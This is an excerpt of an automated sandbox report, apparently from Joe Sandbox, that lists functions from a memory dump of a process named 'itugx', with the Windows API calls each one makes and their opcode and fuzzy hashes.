                                                    • Opcode ID: fcb48486b669207b12bb45064fcfc27b384e48dd02851ae4967490e5eb3fd0e0
                                                    • Instruction ID: 13611dfa9a3058b922c61663a950795225ea4071181ea4c80e48aa2fe4dbd45b
                                                    • Opcode Fuzzy Hash: fcb48486b669207b12bb45064fcfc27b384e48dd02851ae4967490e5eb3fd0e0
                                                    • Instruction Fuzzy Hash: 24F08234504381DBE73A8B60DC49FDB73ACAF89310F004A28F65AC70C0DB309588CB21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00322AD0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 00322FB6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: CALL
                                                    • API String ID: 1385522511-4196123274
                                                    • Opcode ID: 00af9b5c0c623344001552f343896056cee262be16ec88254e29ffea9627708f
                                                    • Instruction ID: e49bf4cf97b44641c9972b664f6c9e74930fcb94dd30443cd3994d3e36a0b39b
                                                    • Opcode Fuzzy Hash: 00af9b5c0c623344001552f343896056cee262be16ec88254e29ffea9627708f
                                                    • Instruction Fuzzy Hash: 8922BA70608311AFC726DF14D880A2BBBF5BF89314F25895DF8968B3A1D731E941CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00321940 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d86305fe11cefaa4d2162b301166ac75f5ba6b14a59c1f1d27ce7239fd3f1bc8
                                                    • Instruction ID: d458c419d8919fd9caae4bcfb3b558034719eec7f2172523aae6d96e0c86de91
                                                    • Opcode Fuzzy Hash: d86305fe11cefaa4d2162b301166ac75f5ba6b14a59c1f1d27ce7239fd3f1bc8
                                                    • Instruction Fuzzy Hash: 9E321030A00214DFCB26DFA4D892BAEB7B8FF15350F158558E856AF2A1D731ED84CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003141E6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003133E9,003E2418,?,?,?,?,?,?,?,003132EF,?), ref: 00314227
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FullNamePath_wcslen
                                                    • String ID: $>
                                                    • API String ID: 4019309064-3568855185
                                                    • Opcode ID: 107b63824048360054959431a0a5e76366771afaacf1fab489dd76d5243103c0
                                                    • Instruction ID: 644f8561b423561fc073692855d709d8219a96cff83f184604a8dac6b85d915c
                                                    • Opcode Fuzzy Hash: 107b63824048360054959431a0a5e76366771afaacf1fab489dd76d5243103c0
                                                    • Instruction Fuzzy Hash: 4311AD756002199BCB5BEBA5D942EDE73ECAF0D350F000465B945EB2D1DEB4E7C88B21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003895F6 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0031557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00315558,?,?,00354B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0031559E
                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00389665
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00389673
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfileStringWrite$FullNamePath
                                                    • String ID:
                                                    • API String ID: 3876400906-0
                                                    • Opcode ID: 42bafa664468affbfe73369fb127ff63603c7ac353cf86277a57e163828bdba3
                                                    • Instruction ID: 8016018c013543dc83e5777eb6af86153d9b6853cf953eac73ab6b8a48a77833
                                                    • Opcode Fuzzy Hash: 42bafa664468affbfe73369fb127ff63603c7ac353cf86277a57e163828bdba3
                                                    • Instruction Fuzzy Hash: 8E1107796006259FCB06EB64C840DAEB7B6FF48360B058884E856AB361DB30FD41CBD4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00316E52 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00313B33,?,00008000), ref: 00316E80
                                                    • CreateFileW.KERNELBASE(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00313B33,?,00008000), ref: 003559A2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: ca5621ee585755d40a132abaf9069de79c8a6489a16f75d5bda844e2a4c0809b
                                                    • Instruction ID: f91d9452cee3f99f579cae5068048bbd3aa34e0450ded4b50e31bce2eaefbefc
                                                    • Opcode Fuzzy Hash: ca5621ee585755d40a132abaf9069de79c8a6489a16f75d5bda844e2a4c0809b
                                                    • Instruction Fuzzy Hash: AF018031245221B6E3760A66CD0EF977F98EF06770F118310BE996A1E0C7B45894CBD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003132A2 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsThemeActive.UXTHEME ref: 003132C4
                                                      • Part of subcall function 0031326D: SystemParametersInfoW.USER32 ref: 00313282
                                                      • Part of subcall function 0031326D: SystemParametersInfoW.USER32 ref: 00313299
                                                      • Part of subcall function 00313312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,003132EF,?), ref: 00313342
                                                      • Part of subcall function 00313312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,003132EF,?), ref: 00313355
                                                      • Part of subcall function 00313312: GetFullPathNameW.KERNEL32(00007FFF,?,?,003E2418,003E2400,?,?,?,?,?,?,003132EF,?), ref: 003133C1
                                                      • Part of subcall function 00313312: SetCurrentDirectoryW.KERNEL32(?,00000001,003E2418,?,?,?,?,?,?,?,003132EF,?), ref: 00313442
                                                    • SystemParametersInfoW.USER32 ref: 003132FE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                    • String ID:
                                                    • API String ID: 1550534281-0
                                                    • Opcode ID: 61506c4c069c78c93964d4fd9da76d4e415363db923f6d3db212f89517966d96
                                                    • Instruction ID: 051a52587f439a803976832370116f0021d9f9f7eea38a4d45afe00be776e154
                                                    • Opcode Fuzzy Hash: 61506c4c069c78c93964d4fd9da76d4e415363db923f6d3db212f89517966d96
                                                    • Instruction Fuzzy Hash: A8F0B4795843849FE7276F60EC8ABA637ACA705305F004905F1198D5E2CBB944808F04
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0032F95E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • timeGetTime.WINMM ref: 0032F97A
                                                      • Part of subcall function 0031EE0A: GetInputState.USER32 ref: 0031EEB7
                                                    • Sleep.KERNEL32(00000000), ref: 0036FAC2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: InputSleepStateTimetime
                                                    • String ID:
                                                    • API String ID: 4149333218-0
                                                    • Opcode ID: fa535c56f752ce53031a62989d203c0eabd797b13f4ed54d40bac78fca6476a0
                                                    • Instruction ID: 2173de2a717aa505f9b1aee8204c79285a546db0a7c84fb28ec9a121663bb8b6
                                                    • Opcode Fuzzy Hash: fa535c56f752ce53031a62989d203c0eabd797b13f4ed54d40bac78fca6476a0
                                                    • Instruction Fuzzy Hash: 35F08C712406059FC359EF69D409B9ABBE9FF4A360F00402AE85ACB660DB70A880CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00318774 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,0031AE65,?,?,?), ref: 00318793
                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,0031AE65,?,?,?), ref: 003187C9
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide
                                                    • String ID:
                                                    • API String ID: 626452242-0
                                                    • Opcode ID: b713cf4083248d280904d89592149b511f903cdc24b79cfa34bbde6de29530fd
                                                    • Instruction ID: 65884a3ff38a8abca3acd4d3358d3da5ae1b986d525837eea24035ee4575003f
                                                    • Opcode Fuzzy Hash: b713cf4083248d280904d89592149b511f903cdc24b79cfa34bbde6de29530fd
                                                    • Instruction Fuzzy Hash: 880184713011047FEB1E6B699D5BFBF7AADDF89750F14003EB506DA1D0ED609C409564
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0031B4B0 Relevance: 1.9, APIs: 1, Instructions: 432COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9909b6f83f45376bd9b37c8935bcc6f8a08bffa24d33a3d9ca21320841c5c889
                                                    • Instruction ID: c40071ef6e380c53f1b5273c916ebefd09f11b0798dea489b61f9afe081f035f
                                                    • Opcode Fuzzy Hash: 9909b6f83f45376bd9b37c8935bcc6f8a08bffa24d33a3d9ca21320841c5c889
                                                    • Instruction Fuzzy Hash: A4F1AE70D102199BCF1EDF94C8919FEF7B9FF48300F55852AE852AB290EB349981CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0033F126 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4421b47f4f52745f84265ef9e162aeb682517cd1481ef13b012d284cbb66b2a9
                                                    • Instruction ID: bc33da82a7b7930c70cf245da7e30572710f7bf64c778655580dbeeda1bdfd81
                                                    • Opcode Fuzzy Hash: 4421b47f4f52745f84265ef9e162aeb682517cd1481ef13b012d284cbb66b2a9
                                                    • Instruction Fuzzy Hash: E651A779E00144EFDB12DF58C881E6A7BB5EB85364F5A8568F8089F392C771ED42CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037FBCA Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 0037FBE3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower
                                                    • String ID:
                                                    • API String ID: 2358735015-0
                                                    • Opcode ID: 398b7f1b630c2ee6a3e8d67e32cd8b5d0c12259c2846629273f50f608e0a4a01
                                                    • Instruction ID: 64b02f01a38f78e951dc9756090563e49cc541533be6f9489b075bbd5ae5f635
                                                    • Opcode Fuzzy Hash: 398b7f1b630c2ee6a3e8d67e32cd8b5d0c12259c2846629273f50f608e0a4a01
                                                    • Instruction Fuzzy Hash: 354196B69002099FCB27EFA4C8819AF77B8FF48310F11853AE9169B151DB74DA45CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00330000 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction ID: 5171bc4ada30c1128a29370147041deb76bb655064e394122ff608c397b2a9f7
                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction Fuzzy Hash: 3631C070A00105DBC71ECF59C4E0A69F7A6FB59300F6986A5E44ACB756D732EDC1CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00388E39 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0031557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00315558,?,?,00354B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0031559E
                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 00388EBE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FullNamePathPrivateProfileString
                                                    • String ID:
                                                    • API String ID: 1991638491-0
                                                    • Opcode ID: 537c1564ee88632b48a8245c332b60ca4154bbd1effe6b4a29e0fdf45330ce23
                                                    • Instruction ID: e99e8dc030411b20f78bb6561a6c2c93a441bcf6397659035caec5f0e53d8abc
                                                    • Opcode Fuzzy Hash: 537c1564ee88632b48a8245c332b60ca4154bbd1effe6b4a29e0fdf45330ce23
                                                    • Instruction Fuzzy Hash: F4211F79600615AFCB1AEB64C982CAEBBB5EF49360B044054F9466B361CB30BD81CBD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0031636D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00316332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0031637F,?,?,003160AA,?,00000001,?,?,00000000), ref: 0031633E
                                                      • Part of subcall function 00316332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00316350
                                                      • Part of subcall function 00316332: FreeLibrary.KERNEL32(00000000,?,?,0031637F,?,?,003160AA,?,00000001,?,?,00000000), ref: 00316362
                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,003160AA,?,00000001,?,?,00000000), ref: 0031639F
                                                      • Part of subcall function 003162FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,003554C3,?,?,003160AA,?,00000001,?,?,00000000), ref: 00316304
                                                      • Part of subcall function 003162FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00316316
                                                      • Part of subcall function 003162FB: FreeLibrary.KERNEL32(00000000,?,?,003554C3,?,?,003160AA,?,00000001,?,?,00000000), ref: 00316329
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressFreeProc
                                                    • String ID:
                                                    • API String ID: 2632591731-0
                                                    • Opcode ID: 4a6d17f41321d470104507976269ff14b8287c47ec981630a0af9b6b746d2158
                                                    • Instruction ID: 8426b0420a23fddbfbe7395014377039719821da91a8a800ef08fce9683274a6
                                                    • Opcode Fuzzy Hash: 4a6d17f41321d470104507976269ff14b8287c47ec981630a0af9b6b746d2158
                                                    • Instruction Fuzzy Hash: CA112731600204AACB1ABBA0CC03BED77A59F59B11F508829F853AE1D2DFB49E859750
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00348792 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: __wsopen_s
                                                    • String ID:
                                                    • API String ID: 3347428461-0
                                                    • Opcode ID: d0ba50e2ac9141aef4c94e187569f68b0fd03f7c46a43ce92b85e961ef20d6a4
                                                    • Instruction ID: daa4fbd514d2f7e8a40859df50cbcdce78f4cf1d85d73b848344edbfec80f7f8
                                                    • Opcode Fuzzy Hash: d0ba50e2ac9141aef4c94e187569f68b0fd03f7c46a43ce92b85e961ef20d6a4
                                                    • Instruction Fuzzy Hash: 0D115A7190410AAFCF16DF58E940A9E7BF9EF48310F1140A9FC08AB311DA31EA11CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0031B050 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00316B73,?,00010000,00000000,00000000,00000000,00000000), ref: 0031B0AC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 3866f5bb3ed65c72267738e1e8f9a4b49df7aabc5c4612eb09e581c8ff8ff0f6
                                                    • Instruction ID: 9e0f8924f075c46a3eccc422d4b05de29c2a437deff74aded2f01a0956280aa4
                                                    • Opcode Fuzzy Hash: 3866f5bb3ed65c72267738e1e8f9a4b49df7aabc5c4612eb09e581c8ff8ff0f6
                                                    • Instruction Fuzzy Hash: 98113A31200705DFD726CE15C480BA7F7E9EF48354F10C42DE9AA8BA50C771A985CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

